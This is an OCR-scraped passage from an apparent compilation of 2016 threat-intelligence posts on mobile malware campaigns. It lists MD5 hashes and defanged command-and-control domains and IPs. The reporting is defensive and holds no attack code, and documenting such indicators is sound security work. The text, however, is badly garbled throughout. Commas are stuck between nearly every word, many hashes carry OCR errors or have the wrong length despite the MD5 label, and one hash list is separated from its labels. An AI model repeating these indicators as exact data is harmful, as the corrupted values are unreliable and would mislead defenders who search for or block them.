the, purpose, of, serving, malicious, software, to, unsuspecting, users. 


In this, post, we’ll profile, the campaign, provide, malicious MD5s, expose, the, infras- 
tructure, behind, it, and, discuss, in-depth, the, tactics, techniques, and, procedures, of, the 
cybercriminals, behind, it. 


Malicious MD5s known to have participated in the campaign: 


MD5: 3e57ef2802977c3c852a94bab131c84b 


Known C &C servers, part, of, the, campaign: 


hxxp://localbitcoinsfast.com - 198.105.215.251 
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hxxp://newdesigns2016.biz - 190.97.166.230 


Once executed, the, sample, phones, back, to, the, following, C &C server: 


hxxp://netspendexpress. biz - 68.71.49.24 


Known to have phoned back to the same malicious C &C server IP (198.105.215.251), 
are, also, the, following, malicious, MD5s: 


MD5: c1b3912711dceab2cfb86f920eb69919 


Once executed, a, sample, malware, phones, back, to, the, following C &C servers: 


hxxp://drone.hosterbox.com (68.71.49.24; 68.71.49.25; 142.4.12.128) 


Known malicious MD5s, known, to, have, phoned, back, to, the, same C &C server IP 
(68.71.49.24): 


MD5: 7453f9445512e48357d91491b0e32134 
MD5: 138c9475d4dc80185d4d3dd612c89d50 


MD5: 2be0a8f626430d6c3c9588b55253ef95 


We'll continue monitoring the campaign, and, post, updates, as, soon, as, new, develop- 
ments, take, place. 


12.2.7. Mobile Malware Intercepted, Thousands of Users Affected (2016-05-16 21:01) 


We've, recently, intercepted, yet, another, malicious, malware, campaign, affecting, Google 
Play, exposing, unsuspecting, users, to, a milti-tude, of malicious, software. 


In this post, we’ll profile, the, campaign, provide, malicious MD5s, expose, the, infras- 
tructure, behind, it, and, discuss, in, depth, the, tactics, techniques, and procedures, of, the, 
cybercriminals, behind, it. 
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Malicious MD5s, known, to, have, participated, in, the, campaign: 
MD5: 1¢87344c24d8316c8f408a6f0396aa43 
MD5: 390e66ffaccaa557a8d5c43c8f3a20a9 
MD5: 8e2f8c52f4bb8a4e7f8393aa4a0536el1 


MD5: ada4b19d5348fecffd8e864e506c5a72 


Once executed, a sample, malware, phones, back, to, the, following C &C, servers: 


hxxp://telbux.pw - 176.9.138.114 


Malicious MD5s, known, to, have, been, downloaded, from, the, same, C &C server IP 
(176.9.138.114): 


MD5: f8471c153414b65bbeb80880dc30da0a 
MD5: 5955411fe84c10fa6af7e40bf40dcdac 
MD5: ec3e5125190d76c19calc0c9172ac930 
MD5: 0551f10503369f12cd975468bff6d16a 


MD5: 1127390826a9409f6fd7ad99c4d4af18 


Once executed, a, sampled, malware, phones, back, to, the, following, C &C server: 


hxxp://144.76.70.213 


hxxp://joyappstech. biz - 136.243.240.229 


We'll, continue, monitoring, the, campaign, and post, updates, as, soon, as, new, devel- 
opments, take, place. 
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12.2.8 Mobile Malware Intercepted, Thousands of Users Affected (2016-05-17 03:34) 


We've, recently, intercepted, yet, another, malicious, mobile, malware, exposing, unsuspect- 
ing, users, to, a, multi-tude, of, malicious, software. 


In this, post, we’ll profile, the, campaign, provide, malicious MD5s, expose, the, infras- 
tructure, behind, it, and, discuss, in-depth, the, tactics, techniques, and, procedures, of, the, 
cybercriminals, behind it. 


Known malicious MD5s, participating, in, the, campaign: 
MD5: 27ad60e62ff86534c0a9331e9451833d 


MD5: 78fbac978d9138651678eb63e7dfd998 


Malicious C &C server, part, of, the, campaign: 


hxxp://apk.longxigame.com - 123.138.67.91; 106.119.191.98 


Known to have been downloaded from the same malicious C &C server IP (123.138.67.91), 
are, also, the, following, malicious, MD5s: 


MD5: a6c9a8cfa41b608573f8a9adf767daa0 
MD5: a5d98369590bd2e001ac3e2986b3d7e9 
MD5: 8c5e6c7bc945877740f10e91e9640f70 
MD5: e€82c58593e787193b5e19810b7ab504e 


MD5: 814d7d6701f00c7b96c7026b5561911c 


Known to have responded, to, the, same, malicious, C &C server (apk.longxigame.com), 
are, also, the, following, malicious, domains: 


hxxp://103.243.139.241 
hxxp://113.105.245.118 


hxxp://183.61.13.192 
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hxxp://183.61.180.216 
hxxp://183.61.180.217 
hxxp://106.119.191.98 
hxxp://221.233.135.196 
hxxp://218.60.119.245 
hxxp://218.60.119.30 
hxxp://118.123.202.27 
hxxp://118.123.202.28 
hxxp://218.60.119.244 
hxxp://119.84.112.118 
hxxp://119.84.112.121 
hxxp://220.181.105.232 
hxxp://27.221.30.76 
hxxp://220.181.105.231 
hxxp://27.221.30.77 
hxxp://60.2.226.246 
hxxp://60.2.226.248 
hxxp://121.29.8.235 
hxxp://60.28.226.51 
hxxp://116.55.241.217 
hxxp://124.95.157.252 
hxxp://124.160.136.232 
hxxp://124.160.136.233 
hxxp://218.60.119.243 


hxxp://218.60.119.252 
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hxxp://218.60.119.29 
hxxp://122.225.34.233 
hxxp://122.225.34.234 
hxxp://171.111.154.243 
hxxp://124.95.157.253 
hxxp://202.100.74.248 
hxxp://221.204.186.231 
hxxp://221.204.186.232 
hxxp://182.140.238.123 
hxxp://218.107.196.223 
hxxp://218.107.196.224 
hxxp://122.227.164.225 
hxxp://122.227.164.226 
hxxp://122.228.95.171 
hxxp://122.228.95.172 
hxxp://123.129.244.23 
hxxp://123.129.244.24 
hxxp://210.22.60.224 
hxxp://125.76.247.230 
hxxp://125.76.247.231 
hxxp://42.81.4.91 
hxxp://42.81.4.92 
hxxp://117.25.155.17 
hxxp://61.154.126.29 


hxxp://116.55.241.218 
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hxxp://106.119.191.97 
hxxp://171.111.154.242 
hxxp://180.96.17.157 
hxxp://180.96.17.160 
hxxp://117.25.155.18 
hxxp://121.207.229.135 
hxxp://61.154.126.28 
hxxp://121.207.229.136 
hxxp://222.85.26.249 
hxxp://222.85.26.250 
hxxp://59.46.4.221 
hxxp://59.46.4.222 
hxxp://183.61.13.191 
hxxp://103.243.139.239 
hxxp://122.141.227.183 
hxxp://114.80.174.98 
hxxp://114.80.174.99 
hxxp://202.100.74.245 
hxxp://58.216.17.111 
hxxp://175.6.3.149 
hxxp://175.6.3.176 
hxxp://61.147.118.229 
hxxp://60.28.226.41 
hxxp://124.112.127.77 


hxxp://124.112.127.78 
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hxxp://124.238.232.242 
hxxp://124.238.232.241 
hxxp://112.90.32.242 
hxxp://112.90.32.241 
hxxp://123.138.67.91 
hxxp://123.138.67.92 
hxxp://122.141.227.182 
hxxp://121.29.8.217 
hxxp://42.81.4.83 
hxxp://218.107.196.236 
hxxp://112.67.242.110 


hxxp://112.90.32.232 


Known malicious MD5s known to have phoned back to the same C &C server (123.138.67.91): 
MD5: 4efbe7fe86f63530d83ae7af5a3dc272 
MD5: d8a3466addf81f2afeb2ca81c49d7361 
MD5: 06e37b0c4a77bfa6al052c4dd50afd9b 


MD5: ed89d5977e334045500d0415154976b6 


Once executed, a, sample, malware, phones, back, to, the, following, C &C server: 
hxxp://api.baizhu.cc - 120.76.122.200 


hxxp://cdn.baizhu.cc - 123.138.67.91 


Once executed a sample malware phones back to the following C &C servers: 


hxxp://yscq.vlgame.cn (203.130.58.30) 
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hxxp://pic.v1.cn (123.138.67.92) 
hxxp://img.g.v1.cn (203.130.58.30) 
hxxp://static.vlgame.cn (203.130.58.30) 


hxxp://pay.vlgame.cn (211.151.85.249) 


We'll continue, monitoring, the, campaign, and post, updates, as, soon, as, new, devel- 
opments, take, place. 
12.2.9 Mobile Malware Hits Google Play, Hundreds of Users Affected (2016-05-17 12:05) 


We've, recently, intercepted, yet, another, malicious, malware-serving, campaign, targeting, 
Google Play, and, exposing, unsuspecting, users, to, a, variety, of, malicious, software. 


In this, post, we’ll, profile, the, campaign, provide, malicious, MD5s, expose, the, infras- 
tructure, behind it, and, discuss, in-depth, the, tactics, techniques, and, procedures, of, the, 
cybercriminals, behind, it. 


Known malicious MD5s, used, in, the, campaign: 
MD5: 6f37c58e5513264fd43c6dd21b6dff32 
MD5: 933171dbfc5bf49cadfb8c6698a86cec 
MD5: dlab7350b4e12d8ac567f4f937c10b87 


MD5: bd33b1133cb5376b660f02c340eea578 


Once executed, sample, malware, phones, back, to, the, following C &C server: 


hxxp://beest-gamess.com - 85.25.217.151 


Known C &C servers, used, in, the, campaign: 


hxxp://Idatjgf.goog-upps.pw - 50.30.36.1 
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hxxp://uwiaoqx.marshmallovw.com/ - 209.126.117.83 


hxxp://google-market2016.com - 217.12.223.34 


Known to have responded to the same malicious C &C server IP (50.30.36.1), are, also, 
the, following, malicious, domains: 


hxxp://iaohzcd.goog-upps.pw 
hxxp://datjgf.goog-upps.pw 
hxxp://Irbixtp.goog-upps.pw 
hxxp://wqhdzry.goog-upps.pw 


hxxp://tqbkmoy.goog-upps.pw 


Known to have responded to the same malicious C &C server IP (209.126.117.83), are, 
also, the, following, malicious, domains: 


hxxp://uppdate-android.com 
hxxp://ysknauo.android-updatel7.pw 
hxxp://updateosystem.online 
hxxp://updateosystem.site 
hxxp://rfdgqsc.update-android-8.xyz 
hxxp://updateosystem.com 
hxxp://gyfwlxt.update-android-4.xyz 
hxxp://update-android-4.xyz 
hxxp://update-android-0.xyz 
hxxp://update-android-1.xyz 
hxxp://iauxelv.marshmallovw.com 
hxxp://xklzogn.installingmarshmallow.com 


hxxp://ytoprkmg.marshmallovw.com 
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hxxp://zknmvga.android-updatel5.pw 
hxxp://btxiqkw.installingmarshmallow.com 
hxxp://dqhukoe.installingmarshmallow.com 
hxxp://kImtifg.installingmarshmallow.com 
hxxp://rxebgnj.installingmarshmallow.com 
hxxp://srwflih.installingmarshmallow.com 
hxxp://vtgqfcy.marshmallovw.com 
hxxp://xvyhwri.marshmallovw.com 
hxxp://zxvmqas.installingmarshmallow.com 
hxxp://neqmcij.android-update14.pw 
hxxp://sdljykc.android-update14.pw 
hxxp://absdfvo.android-update15.pw 
hxxp://android-update15.pw 
hxxp://android-update16.pw 
hxxp://awsvgdq.android-update15.pw 
hxxp://azhdoxi.android-update15.pw 
hxxp://czrptsq.android-update15.pw 
hxxp://deluvgs.android-update15.pw 
hxxp://dywsaxz.android-update15.pw 
hxxp://ebadrwp.android-update15.pw 
hxxp://eoiqnwt.android-update15.pw 
hxxp://fcibqkz.android-update15.pw 
hxxp://fjrklxo.android-update15.pw 
hxxp://fwmlsgc.android-update15.pw 


hxxp://gldkxub.android-update15.pw 
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hxxp://hdnloxt.android-update15.pw 
hxxp://hdukcea.android-update15.pw 
hxxp://hykpbgt.android-update15.pw 
hxxp://kbvdaqfy.android-updatel5.pw 
hxxp://ljpwbdo.android-update15.pw 
hxxp://nbuxlte.android-update15.pw 
hxxp://nlezybf.android-update15.pw 
hxxp://puafogt.android-update15.pw 
hxxp://qantucb.android-update15.pw 
hxxp://qsdmgot.android-update15.pw 
hxxp://qzudjyw.android-update15.pw 
hxxp://rwfhycb.android-update15.pw 
hxxp://rykvsme.android-update15.pw 
hxxp://sacjpvl.android-update15.pw 
hxxp://sejmxda.android-update15.pw 
hxxp://smbanpz.android-update15.pw 
hxxp://spjuoza.android-update15.pw 
hxxp://srfulbg.android-update15.pw 
hxxp://tngezrs.android-update15.pw 
hxxp://tnhfaux.android-update15.pw 
hxxp://txeyzld.android-update15.pw 
hxxp://vzjoasl.android-update15.pw 
hxxp://wobsmtc.android-update15.pw 
hxxp://xmhgfas.android-update15.pw 


hxxp://yufwkqm.android-update15.pw 
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hxxp://zuxvsqd.android-update15.pw 
hxxp://android-update14.pw 
hxxp://android-update17.pw 
hxxp://anejzpi.android-updatel17.pw 
hxxp://avdeymo.android-update15.pw 
hxxp://beswdhm.android-update14.pw 
hxxp://blisztk.android-update16.pw 
hxxp://omedkfx.android-update17.pw 
hxxp://cgloekx.android-update17.pw 
hxxp://cmkxsbu.android-update15.pw 
hxxp://cxzmjty.android-update15.pw 
hxxp://duyzpsk.android-update15.pw 
hxxp://eikjgwc.android-update16.pw 
hxxp://ekogdhq.android-update17.pw 
hxxp://fldsxwj.android-update15.pw 
hxxp://fpgsduq.android-update14.pw 
hxxp://gfaulvq.android-update16.pw 
hxxp://iaupbtn.android-update15.pw 
hxxp://ilcskyb.android-update15.pw 
hxxp://ingvbgf.android-update15.pw 
hxxp://iqtudlh.android-update14.pw 
hxxp://ivpjong.android-updatel17.pw 
hxxp://ixzgoue.android-update15.pw 
hxxp://joyxoeq.android-update17.pw 


hxxp://jdgrvtx.android-update14.pw 
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hxxp://jugbhve.android-update15.pw 
hxxp://jvintuc.android-update15.pw 
hxxp://jznwbmh.android-update15.pw 
hxxp://kcowfmx.android-update17.pw 
hxxp://kjqpdli.android-update16.pw 
hxxp://Ibqzsmf.android-update17.pw 
hxxp://Idjgqys.android-update14.pw 
hxxp://Imbdrht.android-update14.pw 
hxxp://Ixbkact.android-update17.pw 
hxxp://lyaibec.android-update16.pw 
hxxp://movaqcrj.android-update14.pw 
hxxp://moxeuyn.android-update16.pw 
hxxp://mtnvpux.android-updatel14.pw 
hxxp://ncmokfd.android-update16.pw 
hxxp://nmhbjwc.android-update16.pw 
hxxp://ntIrqih.android-update17.pw 
hxxp://nxuivhl.android-update16.pw 
hxxp://okthyij.android-update14.pw 
hxxp://omcpusk.android-update17.pw 
hxxp://oryudhs.android-update17.pw 
hxxp://ozdkhwj.android-update16.pw 
hxxp://ozfkcgn.android-update14.pw 
hxxp://peytxrn.android-update16.pw 
hxxp://piolzns.android-update16.pw 


hxxp://pqunxfj.android-update17.pw 
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hxxp://pwkjdar.android-update14.pw 
hxxp://qblgpyw.android-update17.pw 
hxxp://qfzpmbu.android-update17.pw 
hxxp://qlshbur.android-update16.pw 
hxxp://qpylhtb.android-update15.pw 
hxxp://qzawjve.android-update14.pw 
hxxp://riwgvyc.android-update14.pw 
hxxp://rklsxfo.marshmallovw.com 
hxxp://rucgswq.android-update14.pw 
hxxp://sfvguep.android-update17.pw 
hxxp://sitgerx.android-update17.pw 
hxxp://skzjiec.android-update17.pw 
hxxp://snficje.android-update14.pw 
hxxp://spjiceq.android-update15.pw 
hxxp://t}jvobpwq.android-update17.pw 
hxxp://tzchpkn.android-update17.pw 
hxxp://uavgkrn.android-update17.pw 
hxxp://ucbfjtk.android-update14.pw 
hxxp://ueinloh.android-update14.pw 
hxxp://ugyszlh.android-update14.pw 
hxxp://uryoief.android-update16.pw 
hxxp://vcxsejr.android-update17.pw 
hxxp://vdymzep.android-update15.pw 
hxxp://vtdywbe.android-update14.pw 


hxxp://vwmispo.android-update16.pw 
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hxxp://wcvfhkq.android-update16.pw 
hxxp://wtboiys.android-update17.pw 
hxxp://xcndzit.android-update15.pw 
hxxp://xpnqioe.android-update17.pw 
hxxp://xzhvitg.android-update14.pw 
hxxp://xztrkdj.android-update17.pw 
hxxp://yajfspe.android-update17.pw 
hxxp://ysknauo.android-updatel6.pw 
hxxp://yxtsncz.android-update16.pw 
hxxp://zbmjfxp.android-update15.pw 
hxxp://zmvsaxw.android-update16.pw 
hxxp://zprvoew.android-update14.pw 
hxxp://zqfcsyb.android-update14.pw 
hxxp://anmwfig.marshmallovw.com 
hxxp://bgeomtx.marshmallovw.com 
hxxp://bltferk.marshmallovw.com 
hxxp://bwiuozv.marshmallovw.com 
hxxp://dastgqu.marshmallovw.com 
hxxp://eulcitb.marshmallovw.com 
hxxp://fedtvwb.marshmallovw.com 
hxxp://fxqynok.android-update17.pw 
hxxp://guoiswy.marshmallovw.com 
hxxp://gzqxynp.android-updatel7.pw 
hxxp://hufgenk.marshmallovw.com 


hxxp://jopxute.marshmallovw.com 
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hxxp://kilrezj.android-update17.pw 
hxxp://Incijag.android-update17.pw 
hxxp://mocadgb.marshmallovw.com 
hxxp://ocqdbal.marshmallovw.com 
hxxp://qckexfp.android-update17.pw 
hxxp://qzrcaeo.marshmallovw.com 
hxxp://revbfau.marshmallovw.com 
hxxp://smlerhg.marshmallovw.com 
hxxp://syirtxe.android-update17.pw 
hxxp://syvkjho.android-update17.pw 
hxxp://tejyocm.marshmallovw.com 
hxxp://uahtwly.marshmallovw.com 
hxxp://uwiaogx.marshmallovw.com 
hxxp://uxvwzip.android-update17.pw 
hxxp://wvbcpkg.marshmallovw.com 
hxxp://yhfkpmj.marshmallovw.com 
hxxp://zjovrqm.marshmallovw.com 
hxxp://zlulbmxn.marshmallovw.com 
hxxp://zrdesip.marshmallovw.com 
hxxp://yctfgmn.marshmallovw.com 
hxxp://atyblhn.installingmarshmallow.com 
hxxp://bhizvxk.installingmarshmallow.com 
hxxp://ctjhgnr.installlingmarshmallow.com 
hxxp://glrsudo.installingmarshmallow.com 


hxxp://hiovmga.installlingmarshmallow.com 
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hxxp://jnwxdur.installingmarshmallow.com 
hxxp://jnzglas.installingmarshmallow.com 
hxxp://jrqbhiw.installingmarshmallow.com 
hxxp://Izdapuf.installlingmarshmallow.com 
hxxp://mvypoqg.marshmallovw.com 
hxxp://ntgmcyx.installingmarshmallow.com 
hxxp://owtubye.installingmarshmallow.com 
hxxp://rfnjxhe.installingmarshmallow.com 
hxxp://xkihgqr.installingmarshmallow.com 
hxxp://xmvpguk.installlingmarshmallow.com 
hxxp://ygzaunj.installingmarshmallow.com 
hxxp://zkodxep.installingmarshmallow.com 
hxxp://zyrxwhd.installingmarshmallow.com 
hxxp://installingmarshmallow.com 
hxxp://installlingmarshmallow.com 
hxxp://marshmallovw.com 
hxxp://mkxlwut.google-update2017.com 
hxxp://orpcwlntjxfskqydzoguivaemh.google-market2016.com 
hxxp://jyxqnuz.installlingmarshmallow.com 
hxxp://google-update2017.com 
hxxp://market-place2017.com 
hxxp://market-update2016.com 
hxxp://market-update2017.com 
hxxp://vknghqw.market-update2017.com 


hxxp://update-android2017.com 
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hxxp://google-android2016.ru 

hxxp://google-place2016.ru 

hxxp://google-place2017.ru 

hxxp://google-app2016.com 

hxxp://google-market2016.com 
hxxp://android-market2016.com 
hxxp://jofzevxmadlwcnpysbhurigqktg.android-market2016.com 
hxxp://androidosupdate.com 
hxxp://lvizyxjqoukbrfhtmawegpdscn.androidos-60-update.com 
hxxp://androidos-60-update.com 
hxxp://androidosupdate6.com 

hxxp://androidosupdate6-0.com 
hxxp://android-update-6google.com 
hxxp://android-update-60-google.com 
hxxp://android-update6google.com 
hxxp://android-update-6-google.com 


hxxp://android-update-6.com 


Known to have responded to the same malicious C &C server IP (217.12.223.34), are, 
also, the, following, malicious, domains: 


hxxp://android-market2016.com 
hxxp://google-app2016.com 
hxxp://google-market2016.com 


hxxp://update-player2016.com 


Known to have responded to the same malicious C &C server IP (85.25.217.151) are, 
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also, the, following, malicious, domains: 
hxxp://varr.site 

hxxp://varra.top 

hxxp://varra.xyZ 

hxxp://ugugur.com 
hxxp://alavar-gamess.com 
hxxp://beest-gamess.com 
hxxp://krakatao-giraffe.com 
hxxp://marine-selling.com 
hxxp://quick-sshopping.com 


hxxp://shopping-marine.com 


We'll, continue, monitoring, the, campaign, and, post, updates, as, soon, as, new, devel- 
opments, take, place. 


12.2.10 Mobile Malware Intercepted, Hundreds of Users Affected (2016-05-17 13:06) 


We've recently intercepted, yet, another, malicious, mobile, malware, exposing, users, to, a, 
multi-tude, of, malicious, software. 


In this, post, we'll, profile, the, campaign, provide, malicious MD5s, expose, the, infrastructure, 
and, discuss, in-depth, the, tactics, techniques, and, procedures, of, the, cybercriminals, 
behind, it. 


Malicious MD5 known to have been part of the campaign: 


MD5: febc8518183e13114e7e4da996e64270 


Once executed a sample malware phones back to the following C &C server: 


hxxp://adultix.ru - 91.200.14.105; 185.87.51.121; 94.142.141.18 
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hxxp://xxxmobiletubez.com - 54.72.130.67; 89.144.14.59 


Known to have responded to the same malicious C &C server IP (91.200.14.105) are 
also the following malicious domains: 


hxxp://adultix.ru 
hxxp://pixtrxxx.com 
hxxp://coreectway.com 


hxxp://filingun.com.ua 


Known to have responded to the same malicious C &C server IP (185.87.51.121): 
hxxp://adultix.ru 


hxxp://updsandr.com 


Related malicious MD5s known to have phoned back to the same malicious C &C server 
IP (185.87.51.121): 


MD5: 662e459a0b3a08f5632934565e8d898e 


Known to have responded to the same malicious C &C server IP (94.142.141.18) are 
also the following malicious domains: 


hxxp://updforphone.com 


hxxp://adultix.ru 


Related malicious MD5s, know, to, have, phoned, back, to, the, same, C &C server IP 
(91.200.14.105): 


MD5: 034f764d5d87d15680fff0256a7cf3f0 
MD5: 6a5320f495250ab5e1965fcc3814ef06 


MD5: 5a324d1e2dd88a57df0ae34ef1c8c687 
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MD5: d8f1b92d104c4e68e86f99e7f855caf8 


MD5: 1b31d8db32fb7117d7cf985940a10c54 


Known to have phoned back to the same malicious C &C server IP (54.72.130.67) are 
also the following malicious MD5s: 


MD5: 007dbbed15e254cba024ealfbo553fbb2 
MD5: 066c1377fc124cc5de66f39397d0a502 
MD5: 2cfbalbce9eelcfelf371bcf1755840d 

MD5: 26004eacdd59dcc4fd5fd82423079182 


MD5: 2alcfcl3dac8cea53ce8937ee9b7a2fe 


Once executed a sample malware phones back to the following C &C server: 


hxxp://toolkitgold.org (54.72.130.67) 


We'll continue monitoring, the, campaign, and post, updates, as, soon, as, new, devel- 
opments, take, place. 


12.2.11 Mobile Malware Intercepted, Hundreds of Users Affected (2016-05-30 01:55) 
We've, recently, intercepted, a currently, circulating, malicious, campaign, exposing, Google 


Play, users, to, a variety, of malicious, software, exposing, the confidentiality, integrity, and 
availability, of, their, devices, to, a multi-tude, of, malicious, software. 


In this, post, we’ll, profile, the, campaign, provide, malicious, MD5s, expose, the, infras- 
tructure, behind, it, and, discuss, in depth, the, tactics, techniques, and, procedures, of, the, 
cybercriminals, behind, it. 


Malicious MD5s known to have participated in the campaign: 


MD5: féaedc30fdablb0a0bfebb3d51cb82ea 
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Related malicious MD5s known to have participated in the campaign: 
MD5: ff844a8bb40da72b5c9f3a8c3cda7c9d051921e6 

MD5: 83e56809b1662be002f4e1c4bcd3aef90d060d8f 

MD5: 7c3f693d0b0eab6c6fdbb078e56d7e7 1ffaf648b8 

MD5: 9e36414341e4dbaal13980f7d900e0ac4baa4103 


MD5: 21266e72c8becbb439cb6d77f174b5eccefa2 769 


Once executed a sample malware phones back to the following C &C server: 
hxxp://193.201.224.22 
hxxp://85.143.221.46 


hxxp://85.143.219.118 


Known to have phoned back to the same C &C server IP(193.201.224.22) are also the 
following malicious MD5s: 


MD5: 99f66211f75ace7d103fc2fboc147cd8c 
MD5: ab712f0c6339d2c33cf34df44da972b8 
MD5: d66f59cd897e5992c4dca3cb6f6d198ce 


MD5: 635fbe342c0732294db648e36b8e0a58 


We'll continue, monitoring, the, campaign, and, post, updates, as, soon, as, new, devel- 
opments, take, place. 


12.2.12 Mobile Malware Hits Google Play, Hundreds of Users Affected 
(2016-05-30 02:57) 


We've recently intercepted a currently circulating, malicious, campaign, affecting, hundreds, 
of Google Play users, potentially, exposing, the confidentiality, integrity, and availability, of 
their devices, to, a variety, of malicious, software. 
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In this, post, we’ll, profile, the campaign, provide, malicious MD5s, expose, the infras- 
tructure, behind, it, and, discuss, in depth, the, tactics, techniques, and procedures, of, the, 
cybercriminals, behind, it. 


Malicious MD5s known to have participated in the campaign: 


MD5: 3f57dfe0ca2440bf03fda3e3b1295edc 


Once executed the sample phones back to the following C &C server: 


hxxp://37.1.207.31/api/?id=5 


Related malicious MD5s known to have been downloaded from the same C &C server 
(37.1.207.31): 


MD5: 1fa7df305b49f03e9ecf05fob9cf74b8 
MD5: 52b256f04bc9f5f003e9f292e6fabcc2 
MD5: 76cc87289fa2a2363b42551b180c05de 
MD5: 4ac2c20905c9761b863fdc9e737ea3d5 


MD5: be0493f06f55ef7daf30e7e4d9cd03db 


Related malicious MD5s known to have phoned back to the same C &C server (37.1.207.31): 
MD5: 6ebe7504bcc4003c5b224801e961848c 

MD5: 6f918766c935c7a472c9518c5b4aa7ba 

MD5: 4d083b01c850c418e97c2fcf4031eff5 

MD5: 2ce8dc9e399dc90d54d151laefec97091 


MD5: 8f524b8daa68063af05313870ba198cd 


We'll continue monitoring the campaign, and, post, updates, as, soon, as, new, develop- 
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ments, take, place. 


12.2.13 Mobile Malware Intercepted, Hundreds of Users Affected (2016-05-30 03:40) 


We've recently, intercepted, a currently, circulating, malicious, campaign, exposing, users, to, 
a variety, of, malicious, software, exposing, the, confidentiality, integrity, and availability, of, 
their devices. 


In this, post, we’ll, profile, the, campaign, provide, malicious, MD5s, expose, the, infras- 
tructure, behind, it, and, discuss, in depth, the, tactics, techniques, and procedures, of, the, 
cybercriminals, behind, it. 


Malicious MD5s known to have participated in the campaign: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 


MD5: 
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bd4ed8b3b5d37f34fb63ce2798c585e9 


1¢2c8894ab12a38b7420c7e04ed690f3 


7€3410e3b74866b02f8c8d6a3220aa23 


427ec5aef2a0ca2b2c8edbf24flaeb8f 


770c77bfa64dc89638d5ac07ca6d1246 


3670576f507327fc4cbec45d0b3b6d2e 


5a3d1953631d1e78af6390c88a4ea434 


7322362d952eb63c07b9585107604a90 


d9f63a6944648646343bel1b7fbebe734 


611a6489bb7c9357765b8dd00f00d953 


c81a88af87dfd05f5f757eea56d83fb8 


381a9b123d2b43ae8ff617d708bcfces 


a3bbf048865c48d2b2d5c8973d8a95d3 


MD5: 66f31f76a5633e8a16ffe763093b546b 


MD5: ac74bdca918dc6416cfa4e710d238f43 

MD5: b169837db80e53c4564b62c0a4b9eba3 
MD5: b334c20de944bb15cc8ac6aa59215e73 
MD5: 677aa8cba92cdda2ec80b61fb7052813 


MD5: 7b366d1273c65d0be63b7d68b268d3b8 


Once executed, sample, malware, phones, back, to, the, following, C &C server: 


hxxp://sklasse-b.in.ua/777/gate.php - 217.12.201.60 


Known to have phoned back to the same C &C server IP (217.12.201.60) are also the 
following malicious MD5s: 


MD5: e070535dd1ca923d1b12a71307b2639a 
MD5: 3092a0a15dceb494a62eb00ea1c51283 
MD5: 90123fd7978d42c2cd0alfdc62651eb6 
MD5: 553bed2a3cab5flec98bbec6dc151dd3 


MD5: 947efe328858d816a77ef6b103097097 


Once executed, sample, malware, phones, back, to, the, following, C &C server: 


hxxp://apimobiapps.com/api/app.php - 54.72.9.115; 37.1.210.139 


Known to have phoned back to the same C &C server IP (54.72.9.115) are also the fol- 
lowing malicious MD5s: 


MD5: 7e6429d92bf457f5580457260c92d615 


MD5: f89ee0bd2fa97380ceedbfe5bf3d5c93 
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Known to have phoned back to the same C &C server IP (54.72.9.115) are also the fol- 
lowing malicious MD5s: 


MD5: 886d621a5abeea5609ae813b50ea35a5 
MD5: 576dalff48ae7d4ce092698c20bb9c2c 
MD5: 1c93b5c33585ab60c61c698713a6446d 
MD5: 6afea2ece23b57fe3d3076ca799c18fe 


MD5: 9a43a4bee370f7ae3759a5633b0ee40a 


Once executed a sample malware phones back to the following C &C server: 
hxxp://dh005.com - 54.72.9.115; 172.99.89.215 
hxxp://parkingcrew.net - 185.53.179.29 


hxxp://quickdomainfwd.com - 208.91.196.46 


We'll continue, monitoring, the campaign, and, post, updates, as, soon, as, new, devel- 
opments, take, place. 


12.3 June 


12.3.1 Mobile Malware Intercepted, Hundreds of Users Affected (2016-06-09 10:53) 


We've recently intercepted, a, currently, circulating, malicious, campaign, exposing, users, 
to, a, variety, of malicious software, potentially, exposing, the, confidentiality, integrity, and 
availability, of, their, devices. 


In this, post, we’ll profile, the campaign, provide, malicious MD5s, expose, the, infras- 
tructure, behind, it, and, discuss, in, depth, the, tactics, techniques, and procedures, of, the, 
cybercriminals, behind, it. 


Malicious MD5s known to have participated in the campaign: 
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MD5: beff48e790ed35ba081ea5d852e27c98 


MD5: e200e630ad3af2e91f1060857 7e0ece3 


Once executed a sample malware phones back to the following C &C server: 


hxxp://ksa-sef.com - 166.62.28.116; 107.180.50.244 


Related malicious MD5s known to have phoned back to the same C &C server (166.62.28.116; 
107.180.50.244): 


MD5: c235a6e9700eb647f64113afa7bf028e 
MD5: 3e00678672854c59c95eb4e800ec70a7 


MD5: a24ba1d529ed33b86d04901f7b8e0d0a 


MD5: ce22495bb5dda49a3953b7280b9032ef 
MD5: 94885422e458fae7d83f0765c3cfa799 


MD5: 180ff0b7620d525a2359f419b29a055e 


Once executed a sample malware phones back to the following C &C server: 


hxxp://92.222.71.26/userinfo.php 


Related malicious MD5s, known, to, have, phoned, back, to the, same, C &C server: 
MD5: ea662c74e0cc7f798b9cfa73754e0458 

MD5: a33b472659cba92a620e21797118a96d 

MD5: 41f7c6937803e18c58e435c86771a381 

MD5: cd1bb597d3d9ba25bc983f9be7 2f78ae 


MD5: 92530421468a7532a57757bb1d5c967a 
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Once executed, sample, malware, phones, back, to, the, following, C &C server: 
hxxp://92.222.71.26 

hxxp://176.53.21.105 

hxxp://188.127.231.124 

hxxp://92.222.71.26 


hxxp://107.181.174.15 


Once executed, a, sample, malware, phones, back, to, the, following, C &C servers: 
hxxp://orgyyeetrcy. biz 
hxxp://kfcsrdphvavgvmds.work 
hxxp://dqtfhkgskushlum.org 
hxxp://nxmdtliospnbnveuk.pw 
hxxp://ahhjmkwfnjkitu. biz 
hxxp://gxaabswsxvdohead.su 
hxxp://fkrvelnrphlijkykhf.su 
hxxp://jqdfhsb.info 
hxxp://qgbikqjraxhtndbl. biz 
hxxp://omlsxegqnugqgpctp.click 


hxxp://dinbfdccx.work 


Once executed, a, sample, malware, phones, back, to, the, following, C &C servers: 
hxxp://176.53.21.105 
hxxp://149.202.109.202 


hxxp://31.184.197.72 
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hxxp://92.222.71.26 


hxxp://188.127.231.124 


Once executed, a, sample, malware, phones, back, to, the, following, C &C servers: 
hxxp://omlsxegqnuqgpctp.click 
hxxp://dqtfhkgskushlum.org 
hxxp://gxaabswsxvdohead.su 
hxxp://evesynbkcji.info 
hxxp://kfcsrdphvavgvmds.work 
hxxp://ahhjmkwfnjkitu. biz 
hxxp://dinbfdccx.work 
hxxp://nxmdtliospnbnveuk.pw 
hxxp://orgyyeetrcy. biz 
hxxp://fkrvelnrphlijkykhf.su 


hxxp://jqdfhsb.info 


